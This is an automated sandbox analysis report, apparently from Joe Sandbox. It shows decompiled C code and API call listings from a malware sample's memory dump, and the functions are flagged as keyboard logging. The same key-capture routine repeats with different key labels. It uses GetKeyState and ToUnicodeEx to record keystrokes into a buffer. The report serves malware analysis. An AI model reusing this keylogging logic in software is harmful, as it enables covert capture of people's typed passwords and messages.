Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Arrow Right], xrefs: 00C85D78
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85AE2, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85AE2(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F13]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85ae2
0x00c85ae9
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F13], xrefs: 00C85AE4

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85C58, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85C58(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Insert]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85c58
0x00c85c5f
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Insert], xrefs: 00C85C5A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C8597D, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C8597D(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Finish]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c8597d
0x00c85984
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Finish], xrefs: 00C8597F
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85A5A, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85A5A(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Caps Lock]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85a5a
0x00c85a61
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Caps Lock], xrefs: 00C85A5C

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85B15, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85B15(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F16]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85b15
0x00c85b1c
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F16], xrefs: 00C85B17

Memory Dump Source

